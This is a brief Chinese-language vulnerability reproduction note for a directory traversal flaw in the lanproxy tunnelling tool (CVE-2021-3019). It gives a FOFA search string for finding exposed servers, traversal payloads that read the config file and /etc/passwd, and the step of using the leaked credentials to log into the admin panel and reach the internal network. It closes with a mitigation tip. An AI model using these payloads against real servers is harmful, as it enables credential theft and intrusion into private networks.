lanproxy 目录遍历漏洞（CVE-2021-3019）复现

漏洞描述

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求，可直接获取到lanproxy配置文件，从而登录lanproxy管理后台进入内网。

影响版本

lanproxy 0.1

漏洞验证

fofa.so

header= "Server: LPS-0

 

 

 

 

 

 

POC：读取config文件/../conf/config.properties

 

 利用读取配置文件，获取账密可直接在管理后台进行登录，从而访问内网。

 

 

 

读取/etc/passwd
/../../../../../../../../../../etc/passwd

 

 

 

 修补建议：

lanproxy尚未针对该漏洞发布安全更新，建议禁止将lanproxy管理面板对外部开放